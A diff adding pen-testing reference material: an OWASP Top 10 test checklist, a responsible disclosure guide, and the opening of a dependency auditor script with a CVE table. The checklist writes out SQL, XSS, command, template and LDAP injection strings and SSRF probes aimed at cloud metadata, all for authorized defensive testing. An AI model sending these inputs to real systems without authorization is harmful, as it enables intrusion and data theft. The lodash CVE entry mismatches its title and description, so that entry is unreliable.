+```javascript
+// BAD: Client-side only access control
+{isAdmin && <AdminPanel />}  // Hidden but still accessible via API
+
+// GOOD: Server-side middleware
+app.use('/admin/*', requireRole('admin'));
+```
+
+### Remediation
+
+1. Deny by default — require explicit authorization for every endpoint
+2. Implement server-side access control, never rely on client-side checks
+3. Use UUIDs instead of sequential IDs for resource identifiers
+4. Log and alert on access control failures
+5. Rate limit API requests to minimize automated enumeration
+6. Disable CORS or restrict to specific trusted origins
+7. Invalidate server-side sessions on logout
+
+### CVSS Scoring Guidance
+
+- **Horizontal escalation (read):** CVSS 6.5 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+- **Horizontal escalation (write):** CVSS 8.1 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
+- **Vertical escalation to admin:** CVSS 8.8 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+- **Unauthenticated admin access:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+
+---
+
+## A02:2021 — Cryptographic Failures
+
+**CWEs Covered:** CWE-259, CWE-327, CWE-328, CWE-330, CWE-331
+
+### Description
+
+Failures related to cryptography that often lead to sensitive data exposure. This includes using weak algorithms, improper key management, and transmitting data in cleartext.
+
+### Test Procedures
+
+| # | Test | Method | Expected Result |
+|---|------|--------|-----------------|
+| 1 | TLS version | `nmap --script ssl-enum-ciphers -p 443 target` | Only TLS 1.2+ accepted |
+| 2 | Certificate validity | `openssl s_client -connect target:443` | Valid cert, not self-signed |
+| 3 | HSTS header | Check response headers | `Strict-Transport-Security: max-age=31536000` |
+| 4 | Password storage | Review auth code | bcrypt/scrypt/argon2 with cost >= 10 |
+| 5 | Sensitive data in URLs | Review access logs | No tokens, passwords, or PII in query params |
+| 6 | Encryption at rest | Check database/storage config | Sensitive fields encrypted (AES-256-GCM) |
+| 7 | Key management | Review key storage | Keys in secrets manager, not in code/env files |
+| 8 | Random number generation | Review token generation code | Uses crypto-grade PRNG (secrets module, crypto.randomBytes) |
+
+### Code Patterns to Detect
+
+```python
+# BAD: MD5 for password hashing
+password_hash = hashlib.md5(password.encode()).hexdigest()
+
+# BAD: Hardcoded encryption key
+cipher = AES.new(b"mysecretkey12345", AES.MODE_GCM)
+
+# BAD: Weak random for tokens
+token = str(random.randint(100000, 999999))
+
+# GOOD: bcrypt for passwords
+password_hash = bcrypt.hashpw(password.encode(), bcrypt.gensalt(rounds=12))
+
+# GOOD: Secrets module for tokens
+token = secrets.token_urlsafe(32)
+```
+
+### Remediation
+
+1. Use TLS 1.2+ for all data in transit; redirect HTTP to HTTPS
+2. Use bcrypt (cost 12+), scrypt, or argon2id for password hashing
+3. Use AES-256-GCM for encryption at rest
+4. Store keys in a secrets manager (Vault, AWS Secrets Manager, GCP Secret Manager)
+5. Use `secrets` (Python) or `crypto.randomBytes` (Node.js) for token generation
+6. Enable HSTS with preload
+7. Never store sensitive data in URLs or logs
+
+### CVSS Scoring Guidance
+
+- **Cleartext transmission of passwords:** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+- **Weak password hashing (MD5):** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+- **Hardcoded encryption key:** CVSS 7.2 — AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+
+---
+
+## A03:2021 — Injection
+
+**CWEs Covered:** CWE-20, CWE-74, CWE-75, CWE-77, CWE-78, CWE-79, CWE-89
+
+### Description
+
+Injection flaws occur when untrusted data is sent to an interpreter as part of a command or query. Includes SQL, NoSQL, OS command, LDAP, XPath, and template injection.
+
+### Test Procedures
+
+| # | Test | Method | Expected Result |
+|---|------|--------|-----------------|
+| 1 | SQL injection | Submit `' OR 1=1--` in input fields | No data leakage, proper error handling |
+| 2 | Blind SQL injection | Submit `' AND SLEEP(5)--` | No 5-second delay in response |
+| 3 | NoSQL injection | Submit `{"$gt":""}` in JSON fields | No data leakage |
+| 4 | XSS (reflected) | Submit `<script>alert(1)</script>` | Input is escaped/encoded in response |
+| 5 | XSS (stored) | Submit payload in persistent fields | Payload is sanitized before storage |
+| 6 | Command injection | Submit `; whoami` in fields | No command execution |
+| 7 | Template injection | Submit `{{7*7}}` | No "49" in response |
+| 8 | LDAP injection | Submit `*)(uid=*))(|(uid=*` | No directory enumeration |
+
+### Code Patterns to Detect
+
+```python
+# BAD: String concatenation in SQL
+cursor.execute("SELECT * FROM users WHERE email = '" + email + "'")
+cursor.execute(f"SELECT * FROM users WHERE email = '{email}'")
+
+# GOOD: Parameterized query
+cursor.execute("SELECT * FROM users WHERE email = %s", (email,))
+```
+
+```javascript
+// BAD: Template literal in SQL
+db.query(`SELECT * FROM users WHERE id = ${userId}`);
+
+// GOOD: Parameterized query
+db.query('SELECT * FROM users WHERE id = $1', [userId]);
+```
+
+### Remediation
+
+1. Use parameterized queries / prepared statements for ALL database operations
+2. Use ORM methods with bound parameters (not raw queries)
+3. Validate and sanitize all input on the server side
+4. Use Content-Security-Policy to mitigate XSS impact
+5. Escape output based on context (HTML, JS, URL, CSS)
+6. Never pass user input to eval(), exec(), os.system(), or child_process
+7. Use allowlists for expected input formats
+
+### CVSS Scoring Guidance
+
+- **SQL injection (unauthenticated):** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+- **Stored XSS:** CVSS 7.1 — AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+- **Reflected XSS:** CVSS 6.1 — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+- **Command injection:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+
+---
+
+## A04:2021 — Insecure Design
+
+**CWEs Covered:** CWE-209, CWE-256, CWE-501, CWE-522
+
+### Description
+
+Insecure design represents weaknesses in the design and architecture of the application, distinct from implementation bugs. This includes missing or ineffective security controls.
+
+### Test Procedures
+
+| # | Test | Method | Expected Result |
+|---|------|--------|-----------------|
+| 1 | Rate limiting | Send 100 rapid requests to login | 429 after threshold (5-10 attempts) |
+| 2 | Business logic abuse | Submit negative quantities, skip payment | All calculations server-side |
+| 3 | Account lockout | 10+ failed login attempts | Account locked or CAPTCHA triggered |
+| 4 | Multi-step flow bypass | Skip steps via direct URL access | Server validates state at each step |
+| 5 | Password reset abuse | Request multiple reset tokens | Previous tokens invalidated |
+
+### Remediation
+
+1. Use threat modeling during design phase (STRIDE, PASTA)
+2. Implement rate limiting on all sensitive endpoints
+3. Validate business logic on the server, never trust client calculations
+4. Use state machines for multi-step workflows
+5. Implement CAPTCHA for public-facing forms after threshold
+
+### CVSS Scoring Guidance
+
+- **Missing rate limit on auth:** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+- **Business logic bypass (financial):** CVSS 8.1 — AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
+
+---
+
+## A05:2021 — Security Misconfiguration
+
+**CWEs Covered:** CWE-2, CWE-11, CWE-13, CWE-15, CWE-16, CWE-388
+
+### Description
+
+The application is improperly configured, with default settings, unnecessary features enabled, verbose error messages, or missing security hardening.
+
+### Test Procedures
+
+| # | Test | Method | Expected Result |
+|---|------|--------|-----------------|
+| 1 | Default credentials | Try admin:admin, root:root | Rejected |
+| 2 | Debug mode | Trigger application errors | No stack traces in response |
+| 3 | Security headers | Check response headers | CSP, X-Frame-Options, XCTO, HSTS present |
+| 4 | HTTP methods | Send OPTIONS request | Only required methods allowed |
+| 5 | Directory listing | Request directory without index | Listing disabled (403 or redirect) |
+| 6 | Server version disclosure | Check Server and X-Powered-By headers | Version info removed |
+| 7 | Error messages | Submit invalid data | Generic error messages, no internal details |
+
+### Remediation
+
+1. Disable debug mode in production
+2. Remove default credentials and accounts
+3. Add all security headers (CSP, HSTS, X-Frame-Options, XCTO, Referrer-Policy)
+4. Remove Server and X-Powered-By headers
+5. Disable directory listing
+6. Implement generic error pages
+
+### CVSS Scoring Guidance
+
+- **Debug mode in production:** CVSS 5.3 — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+- **Default admin credentials:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+- **Missing security headers:** CVSS 4.3 — AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+
+---
+
+## A06:2021 — Vulnerable and Outdated Components
+
+**CWEs Covered:** CWE-1035, CWE-1104
+
+### Description
+
+Components (libraries, frameworks, software modules) with known vulnerabilities that can undermine application defenses.
+
+### Test Procedures
+
+| # | Test | Method | Expected Result |
+|---|------|--------|-----------------|
+| 1 | npm audit | `npm audit --json` | No critical or high vulnerabilities |
+| 2 | pip audit | `pip audit --desc` | No known CVEs |
+| 3 | Go vulncheck | `govulncheck ./...` | No reachable vulnerabilities |
+| 4 | EOL check | Compare framework versions to vendor EOL dates | No EOL components |
+| 5 | License audit | Check dependency licenses | No copyleft licenses in proprietary code |
+
+### Remediation
+
+1. Run dependency audits in CI/CD (block merges on critical/high)
+2. Set up automated dependency update PRs (Dependabot, Renovate)
+3. Pin dependency versions in lock files
+4. Remove unused dependencies
+5. Subscribe to security advisories for key dependencies
+
+### CVSS Scoring Guidance
+
+Inherit the CVSS score from the upstream CVE. Add environmental metrics based on reachability.
+
+---
+
+## A07:2021 — Identification and Authentication Failures
+
+**CWEs Covered:** CWE-255, CWE-259, CWE-287, CWE-288, CWE-384, CWE-798
+
+### Description
+
+Weaknesses in authentication mechanisms that allow attackers to compromise passwords, keys, session tokens, or exploit implementation flaws to assume other users' identities.
+
+### Test Procedures
+
+| # | Test | Method | Expected Result |
+|---|------|--------|-----------------|
+| 1 | Brute force | 100 rapid login attempts | Account lockout or exponential backoff |
+| 2 | Session cookie flags | Inspect cookies in browser | HttpOnly, Secure, SameSite set |
+| 3 | Session invalidation | Logout, replay session cookie | 401 Unauthorized |
+| 4 | Username enumeration | Submit valid/invalid usernames | Identical error messages |
+| 5 | Password policy | Submit "12345" as password | Rejected (min 8 chars, complexity) |
+| 6 | Password reset token | Request reset, check token expiry | Token expires in 15-60 minutes |
+| 7 | MFA bypass | Skip MFA step via direct API call | Requires MFA completion |
+
+### Remediation
+
+1. Implement multi-factor authentication
+2. Set session cookies with HttpOnly, Secure, SameSite=Strict
+3. Invalidate sessions on logout and password change
+4. Use generic error messages ("Invalid credentials" not "User not found")
+5. Enforce strong password policy (NIST SP 800-63B)
+6. Expire password reset tokens within 15-60 minutes
+
+### CVSS Scoring Guidance
+
+- **Authentication bypass:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+- **Session fixation:** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+- **Username enumeration:** CVSS 5.3 — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+
+---
+
+## A08:2021 — Software and Data Integrity Failures
+
+**CWEs Covered:** CWE-345, CWE-353, CWE-426, CWE-494, CWE-502, CWE-565, CWE-829
+
+### Description
+
+Code and infrastructure that does not protect against integrity violations, including unsafe deserialization, unsigned updates, and CI/CD pipeline manipulation.
+
+### Test Procedures
+
+| # | Test | Method | Expected Result |
+|---|------|--------|-----------------|
+| 1 | Unsafe deserialization | Send crafted serialized objects | Rejected or safely handled |
+| 2 | SRI on CDN resources | Check script/link tags | Integrity attribute present |
+| 3 | CI/CD pipeline | Review pipeline config | Signed commits, protected branches |
+| 4 | Update integrity | Check update mechanism | Signed artifacts, hash verification |
+
+### Remediation
+
+1. Use `yaml.safe_load()` instead of `yaml.load()`
+2. Avoid `pickle.loads()` on untrusted data
+3. Add SRI hashes to all CDN-loaded scripts
+4. Sign all deployment artifacts
+5. Protect CI/CD pipeline with branch protection and signed commits
+
+### CVSS Scoring Guidance
+
+- **Unsafe deserialization (RCE):** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+- **Missing SRI on CDN scripts:** CVSS 6.1 — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+
+---
+
+## A09:2021 — Security Logging and Monitoring Failures
+
+**CWEs Covered:** CWE-117, CWE-223, CWE-532, CWE-778
+
+### Description
+
+Without sufficient logging and monitoring, breaches cannot be detected. Logging too little means missed attacks; logging too much (sensitive data) creates new risks.
+
+### Test Procedures
+
+| # | Test | Method | Expected Result |
+|---|------|--------|-----------------|
+| 1 | Auth event logging | Attempt valid/invalid logins | Both logged with timestamp and IP |
+| 2 | Sensitive data in logs | Review log output | No passwords, tokens, PII, credit cards |
+| 3 | Alert thresholds | Trigger 50 failed logins | Alert generated |
+| 4 | Log integrity | Check log storage | Append-only or integrity-protected storage |
+| 5 | Admin action audit trail | Perform admin actions | All actions logged with user identity |
+
+### Remediation
+
+1. Log all authentication events (success and failure)
+2. Sanitize logs — strip passwords, tokens, PII before writing
+3. Set up alerting on anomalous patterns (SIEM integration)
+4. Use append-only log storage (CloudWatch, Splunk, immutable S3)
+5. Maintain audit trail for all admin and data-modifying actions
+
+### CVSS Scoring Guidance
+
+Logging failures are typically scored as contributing factors rather than standalone vulnerabilities. When combined with other findings, they increase the overall risk level.
+
+---
+
+## A10:2021 — Server-Side Request Forgery (SSRF)
+
+**CWEs Covered:** CWE-918
+
+### Description
+
+SSRF occurs when a web application fetches a remote resource without validating the user-supplied URL, allowing attackers to reach internal services, cloud metadata endpoints, or other protected resources.
+
+### Test Procedures
+
+| # | Test | Method | Expected Result |
+|---|------|--------|-----------------|
+| 1 | Internal IP access | Submit `http://127.0.0.1` in URL fields | Request blocked |
+| 2 | Cloud metadata | Submit `http://169.254.169.254/latest/meta-data/` | Request blocked |
+| 3 | IPv6 localhost | Submit `http://[::1]` | Request blocked |
+| 4 | DNS rebinding | Use DNS rebinding service | Request blocked after resolution |
+| 5 | URL encoding bypass | Submit `http://0x7f000001` (hex localhost) | Request blocked |
+| 6 | Open redirect chain | Find open redirect, chain to internal URL | Request blocked |
+
+### Code Patterns to Detect
+
+```python
+# BAD: User-controlled URL without validation
+url = request.args.get("url")
+response = requests.get(url)  # SSRF!
+
+# GOOD: URL allowlist validation
+ALLOWED_HOSTS = {"api.example.com", "cdn.example.com"}
+parsed = urlparse(url)
+if parsed.hostname not in ALLOWED_HOSTS:
+    abort(403, "URL not in allowlist")
+response = requests.get(url)
+```
+
+### Remediation
+
+1. Validate and allowlist outbound URLs (domain, scheme, port)
+2. Block requests to private IP ranges (10.x, 172.16-31.x, 192.168.x, 127.x, 169.254.x)
+3. Block requests to cloud metadata endpoints
+4. Use a dedicated egress proxy for outbound requests
+5. Disable unnecessary URL-fetching features
+6. Resolve DNS and validate the IP address before making the request
+
+### CVSS Scoring Guidance
+
+- **SSRF to cloud metadata (credential theft):** CVSS 9.1 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+- **SSRF to internal service (read):** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+- **Blind SSRF (no response data):** CVSS 5.3 — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
--- a/engineering-team/security-pen-testing/references/responsible_disclosure.md
+++ b/engineering-team/security-pen-testing/references/responsible_disclosure.md
@@ -0,0 +1,317 @@
+# Responsible Disclosure Guide
+
+A complete guide for responsibly reporting security vulnerabilities found during authorized testing or independent security research.
+
+---
+
+## Disclosure Timeline Templates
+
+### Standard 90-Day Disclosure
+
+The industry-standard timeline used by Google Project Zero, CERT/CC, and most security researchers.
+
+| Day | Action | Owner |
+|-----|--------|-------|
+| 0 | Discover vulnerability, document with evidence | Researcher |
+| 1 | Submit initial report to vendor security contact | Researcher |
+| 3 | Confirm report received (if no auto-acknowledgment) | Researcher |
+| 7 | Follow up if no acknowledgment received | Researcher |
+| 7 | Acknowledge receipt, assign tracking ID | Vendor |
+| 14 | Provide initial severity assessment and timeline | Vendor |
+| 30 | First status update on remediation progress | Vendor |
+| 30 | Request update if none provided | Researcher |
+| 60 | Second status update; fix should be in development | Vendor |
+| 60 | Offer technical assistance if fix is delayed | Researcher |
+| 90 | Public disclosure deadline (with or without fix) | Researcher |
+| 90+ | Coordinate joint disclosure statement if fix is ready | Both |
+
+### Accelerated 30-Day Disclosure
+
+For actively exploited vulnerabilities or critical severity (CVSS 9.0+):
+
+| Day | Action |
+|-----|--------|
+| 0 | Discover, document, report immediately |
+| 1 | Vendor acknowledges |
+| 7 | Vendor provides remediation timeline |
+| 14 | Status update; patch expected |
+| 30 | Public disclosure |
+
+### Extended 120-Day Disclosure
+
+For complex vulnerabilities requiring architectural changes:
+
+| Day | Action |
+|-----|--------|
+| 0 | Report submitted |
+| 14 | Vendor acknowledges, confirms complexity |
+| 30 | Vendor provides detailed remediation plan |
+| 60 | Status update, partial fix may be deployed |
+| 90 | Near-complete remediation expected |
+| 120 | Full disclosure |
+
+**When to extend:** Only if the vendor is actively working on a fix and communicating progress. A vendor that goes silent does not earn extra time.
+
+---
+
+## Communication Templates
+
+### Initial Vulnerability Report
+
+```
+Subject: Security Vulnerability Report — [Brief Title]
+
+To: security@[vendor].com
+
+Dear Security Team,
+
+I am writing to report a security vulnerability I discovered in [Product/Service Name].
+
+## Summary
+- **Vulnerability Type:** [e.g., SQL Injection, SSRF, Authentication Bypass]
+- **Severity:** [Critical/High/Medium/Low] (CVSS: X.X)
+- **Affected Component:** [e.g., /api/login endpoint, User Profile page]
+- **Discovery Date:** [YYYY-MM-DD]
+
+## Description
+[Clear, technical description of the vulnerability — what it is, where it exists, and why it matters.]
+
+## Steps to Reproduce
+1. [Step 1]
+2. [Step 2]
+3. [Step 3]
+
+## Evidence
+[Screenshots, request/response pairs, or proof-of-concept code. Non-destructive only.]
+
+## Impact
+[What an attacker could achieve by exploiting this vulnerability.]
+
+## Suggested Remediation
+[Your recommendation for fixing the issue.]
+
+## Disclosure Timeline
+I follow a [90-day] responsible disclosure policy. I plan to publicly disclose this finding on [DATE] unless we agree on an alternative timeline.
+
+## Researcher Information
+- Name: [Your Name]
+- Organization: [Your Organization, if applicable]
+- Contact: [Your Email]
+- PGP Key: [Fingerprint or link to public key]
+
+I have not accessed any user data, modified any systems, or shared this information with anyone else. I am happy to provide additional details or assist with remediation.
+
+Best regards,
+[Your Name]
+```
+
+### Follow-Up (No Response After 7 Days)
+
+```
+Subject: Re: Security Vulnerability Report — [Brief Title] (Follow-Up)
+
+Dear Security Team,
+
+I am following up on the security vulnerability report I submitted on [DATE] regarding [Brief Title].
+
+I have not yet received an acknowledgment. Could you please confirm receipt and provide an estimated timeline for review?
+
+For reference, my original report is included below / attached.
+
+I remain available to provide additional details or clarification.
+
+Best regards,
+[Your Name]
+```
+
+### Status Update Request (Day 30)
+
+```
+Subject: Re: Security Vulnerability Report — [Brief Title] (30-Day Update Request)
+
+Dear Security Team,
+
+It has been 30 days since I reported the [vulnerability type] in [component]. I would appreciate an update on:
+
+1. Has the vulnerability been confirmed?
+2. What is the remediation timeline?
+3. Is there anything I can do to assist?
+
+As noted in my original report, I follow a 90-day disclosure policy. The current disclosure date is [DATE].
+
+Best regards,
+[Your Name]
+```
+
+### Pre-Disclosure Notification (Day 80)
+
+```
+Subject: Re: Security Vulnerability Report — [Brief Title] (Pre-Disclosure Notice)
+
+Dear Security Team,
+
+This is a courtesy notice that the 90-day disclosure window for [vulnerability] will close on [DATE].
+
+Current status as I understand it: [summarize last known status].
+
+If a fix is not yet available, I recommend:
+- Publishing a security advisory acknowledging the issue
+- Providing mitigation guidance to affected users
+- Communicating a realistic remediation timeline
+
+I am willing to:
+- Extend the deadline by [X] days if you can provide a concrete remediation date
+- Review the patch before public release
+- Coordinate joint disclosure
+
+Please respond by [DATE - 5 days] so we can align on the disclosure approach.
+
+Best regards,
+[Your Name]
+```
+
+### Public Disclosure Statement
+
+```
+# Security Advisory: [Title]
+
+**Reported:** [Date]
+**Disclosed:** [Date]
+**Vendor:** [Vendor Name]
+**Status:** [Fixed in version X.Y.Z / Unpatched / Mitigated]
+
+## Summary
+[Brief description accessible to non-technical readers.]
+
+## Technical Details
+[Full technical description, reproduction steps, evidence.]
+
+## Impact
+[What could be exploited and the blast radius.]
+
+## Timeline
+| Date | Event |
+|------|-------|
+| [Date] | Vulnerability discovered |
+| [Date] | Report submitted to vendor |
+| [Date] | Vendor acknowledged |
+| [Date] | Fix released (version X.Y.Z) |
+| [Date] | Public disclosure |
+
+## Remediation
+[Steps users should take — update to version X, apply config change, etc.]
+
+## Credit
+Discovered by [Your Name] ([Organization]).
+```
+
+---
+
+## Legal Considerations
+
+### Before You Test
+
+1. **Written authorization is required.** For external testing, obtain a signed rules-of-engagement document or scope-of-work. For bug bounty programs, the program's terms of service serve as authorization.
+
+2. **Understand local laws.** The Computer Fraud and Abuse Act (CFAA) in the US, the Computer Misuse Act in the UK, and equivalent laws in other jurisdictions criminalize unauthorized access. Authorization is your legal shield.
+
+3. **Stay within scope.** If the bug bounty program says "*.example.com only," do not test anything outside that scope. If your pen test contract covers the web application, do not pivot to internal networks.
+
+4. **Document everything.** Keep timestamped records of all testing activities: what you tested, when, what you found, and what you did not do (e.g., "did not access real user data").
+
+### During Testing
+
+1. **Do not access real user data.** Use your own test accounts. If you accidentally access real data, stop immediately, document the incident, and report it to the vendor.
+
+2. **Do not cause damage.** No data destruction, no denial-of-service, no resource exhaustion. If a test might cause disruption, get explicit approval first.
+
+3. **Do not exfiltrate data.** Demonstrate the vulnerability with minimal proof. A screenshot showing "1000 records returned" is sufficient — downloading the records is not.
+
+4. **Do not install backdoors.** Even for "maintaining access during testing." If you need persistent access, work with the vendor's team.
+
+### During Disclosure
+
+1. **Do not threaten.** Disclosure timelines are industry practice, not ultimatums. Communicate professionally.
+
+2. **Do not sell vulnerability details.** Selling to exploit brokers instead of reporting to the vendor is irresponsible and may be illegal.
+
+3. **Give vendors reasonable time.** 90 days is standard. Complex architectural fixes may need more time if the vendor is communicating and making progress.
+
+4. **Do not publicly disclose details that help attackers exploit unpatched systems.** If the fix is not yet deployed, disclose the existence and severity of the issue without full exploitation details.
+
+---
+
+## Bug Bounty Program Integration
+
+### Finding the Right Program
+
+1. **Check the vendor's website:** Look for `/security`, `/.well-known/security.txt`, or a security page
+2. **Bug bounty platforms:** HackerOne, Bugcrowd, Intigriti, YesWeHack
+3. **No program?** Report to `security@[vendor].com` or use CERT/CC as an intermediary
+
+### Bug Bounty Best Practices
+
+1. **Read the entire policy** before testing — scope, exclusions, safe harbor
+2. **Test only in-scope assets** — out-of-scope findings may not be rewarded and could be legally risky
+3. **Report one vulnerability per submission** — do not bundle unrelated issues
+4. **Provide clear reproduction steps** — assume the reader cannot read your mind
+5. **Do not duplicate** — search existing reports before submitting
+6. **Be patient** — triage can take days to weeks depending on program volume
+7. **Do not publicly disclose** until the program explicitly permits it
+
+### If No Bug Bounty Exists
+
+1. Report directly to `security@[vendor].com`
+2. If no response after 14 days, try CERT/CC (https://www.kb.cert.org/vuls/report/)
+3. Follow the standard disclosure timeline
+4. Do not expect payment — responsible disclosure is an ethical practice, not a paid service
+
+---
+
+## CVE Request Process
+
+### When to Request a CVE
+
+- The vulnerability affects publicly available software
+- The vendor has confirmed the issue
+- A fix is available or will be available soon
+
+### How to Request
+
+1. **Through the vendor:** If the vendor is a CNA (CVE Numbering Authority), they will assign the CVE
+2. **Through MITRE:** If the vendor is not a CNA, submit a request at https://cveform.mitre.org/
+3. **Through a CNA:** Some platforms (HackerOne, GitHub) are CNAs and can assign CVEs for vulnerabilities in their scope
+
+### Information Required
+
+```
+- Vulnerability type (CWE ID if known)
+- Affected product and version range
+- Fixed version (if available)
+- Attack vector (network, local, physical)
+- Impact (confidentiality, integrity, availability)
+- CVSS score and vector string
+- Description (one paragraph, technical but readable)
+- References (advisory URL, patch commit, bug report)
+```
+
+### CVE ID Format
+
+```
+CVE-YYYY-NNNNN
+Example: CVE-2024-12345
+```
+
+After assignment, the CVE will be published in the NVD (National Vulnerability Database) at https://nvd.nist.gov/.
+
+---
+
+## Key Principles Summary
+
+1. **Report first, disclose later.** Always give the vendor a chance to fix the issue before going public.
+2. **Minimize impact.** Prove the vulnerability exists without causing damage or accessing real data.
+3. **Communicate professionally.** Security is stressful for everyone. Be clear, helpful, and patient.
+4. **Document everything.** Timestamps, evidence, communications — protect yourself and the process.
+5. **Follow through.** A report without follow-up helps no one. Stay engaged until the issue is resolved.
+6. **Credit where due.** Acknowledge the vendor's response (positive or negative) in your disclosure.
+7. **Know the law.** Authorization and scope are your legal foundations. Never test without them.
--- a/engineering-team/security-pen-testing/scripts/dependency_auditor.py
+++ b/engineering-team/security-pen-testing/scripts/dependency_auditor.py
@@ -0,0 +1,455 @@
+#!/usr/bin/env python3
+"""
+Dependency Auditor - Analyze package manifests for known vulnerable patterns.
+
+Table of Contents:
+    DependencyAuditor - Main class for dependency vulnerability analysis
+        __init__              - Initialize with manifest path and severity filter
+        audit()               - Run full audit on the manifest
+        _parse_manifest()     - Detect and parse the manifest file
+        _parse_package_json() - Parse npm package.json
+        _parse_requirements() - Parse pip requirements.txt
+        _parse_go_mod()       - Parse Go go.mod
+        _parse_gemfile()      - Parse Ruby Gemfile
+        _check_vulnerabilities() - Check packages against known CVE patterns
+        _check_risky_patterns()  - Detect risky dependency patterns
+    main() - CLI entry point
+
+Usage:
+    python dependency_auditor.py --file package.json
+    python dependency_auditor.py --file requirements.txt --severity high
+    python dependency_auditor.py --file go.mod --json
+"""
+
+import argparse
+import json
+import os
+import re
+import sys
+from dataclasses import dataclass, asdict, field
+from datetime import datetime
+from pathlib import Path
+from typing import Dict, List, Optional, Tuple
+
+
+@dataclass
+class Dependency:
+    """Represents a parsed dependency."""
+    name: str
+    version: str
+    ecosystem: str  # npm, pypi, go, rubygems
+    is_dev: bool = False
+
+
+@dataclass
+class VulnerabilityFinding:
+    """A known vulnerability match for a dependency."""
+    package: str
+    installed_version: str
+    vulnerable_range: str
+    cve_id: str
+    severity: str  # critical, high, medium, low
+    title: str
+    description: str
+    remediation: str
+    cvss_score: float = 0.0
+    references: List[str] = field(default_factory=list)
+
+
+@dataclass
+class RiskyPattern:
+    """A risky dependency pattern (not a CVE, but a concern)."""
+    package: str
+    pattern_type: str  # pinning, wildcard, deprecated, typosquat
+    severity: str
+    description: str
+    recommendation: str
+
+
+class DependencyAuditor:
+    """Analyze package manifests for known vulnerable patterns and risky dependencies."""
+
+    # Known vulnerable package versions (curated subset of high-profile CVEs)
+    KNOWN_VULNS = [
+        {"ecosystem": "npm", "package": "lodash", "below": "4.17.21",
+         "cve": "CVE-2021-23337", "severity": "high", "cvss": 7.2,
+         "title": "Prototype Pollution in lodash",
+         "description": "lodash before 4.17.21 is vulnerable to Command Injection via template function.",
+         "remediation": "Upgrade lodash to >=4.17.21"},
+        {"ecosystem": "npm", "package": "axios", "below": "1.6.0",
+         "cve": "CVE-2023-45857", "severity": "medium", "cvss": 6.5,
+         "title": "CSRF token exposure in axios",
+         "description": "axios before 1.6.0 inadvertently exposes CSRF tokens in cross-site requests.",
+         "remediation": "Upgrade axios to >=1.6.0"},
+        {"ecosystem": "npm", "package": "express", "below": "4.19.2",
+         "cve": "CVE-2024-29041", "severity": "medium", "cvss": 6.1,
+         "title": "Open Redirect in express",
+         "description": "express before 4.19.2 allows open redirects via malicious URLs.",
+         "remediation": "Upgrade express to >=4.19.2"},
+        {"ecosystem": "npm", "package": "jsonwebtoken", "below": "9.0.0",
+         "cve": "CVE-2022-23529", "severity": "critical", "cvss": 9.8,
+         "title": "Insecure key retrieval in jsonwebtoken",
+         "description": "jsonwebtoken before 9.0.0 allows key confusion attacks via secretOrPublicKey.",
+         "remediation": "Upgrade jsonwebtoken to >=9.0.0"},
+        {"ecosystem": "npm", "package": "minimatch", "below": "3.0.5",
+         "cve": "CVE-2022-3517", "severity": "high", "cvss": 7.5,
+         "title": "ReDoS in minimatch",
+         "description": "minimatch before 3.0.5 is vulnerable to Regular Expression Denial of Service.",
+         "remediation": "Upgrade minimatch to >=3.0.5"},
+        {"ecosystem": "npm", "package": "tar", "below": "6.1.9",
+         "cve": "CVE-2021-37713", "severity": "high", "cvss": 8.6,
+         "title": "Arbitrary File Creation in tar",
+         "description": "tar before 6.1.9 allows arbitrary file creation/overwrite via symlinks.",
+         "remediation": "Upgrade tar to >=6.1.9"},
+        {"ecosystem": "pypi", "package": "pillow", "below": "9.3.0",
+         "cve": "CVE-2022-45198", "severity": "high", "cvss": 7.5,
+         "title": "DoS via crafted image in Pillow",
+         "description": "Pillow before 9.3.0 allows denial of service via specially crafted image files.",
+         "remediation": "Upgrade Pillow to >=9.3.0"},
+        {"ecosystem": "pypi", "package": "django", "below": "4.2.8",
+         "cve": "CVE-2023-46695", "severity": "high", "cvss": 7.5,
+         "title": "DoS via file uploads in Django",
+         "description": "Django before 4.2.8 allows denial of service via large file uploads.",
+         "remediation": "Upgrade Django to >=4.2.8"},
+        {"ecosystem": "pypi", "package": "flask", "below": "2.3.2",
+         "cve": "CVE-2023-30861", "severity": "high", "cvss": 7.5,
+         "title": "Session cookie exposure in Flask",
+         "description": "Flask before 2.3.2 may expose session cookies on cross-origin redirects.",
+         "remediation": "Upgrade Flask to >=2.3.2"},
+        {"ecosystem": "pypi", "package": "requests", "below": "2.31.0",
+         "cve": "CVE-2023-32681", "severity": "medium", "cvss": 6.1,
+         "title": "Proxy-Authorization header leak in requests",
+         "description": "requests before 2.31.0 leaks Proxy-Authorization headers on redirects.",
+         "remediation": "Upgrade requests to >=2.31.0"},
+        {"ecosystem": "pypi", "package": "cryptography", "below": "41.0.0",
+         "cve": "CVE-2023-38325", "severity": "high", "cvss": 7.5,
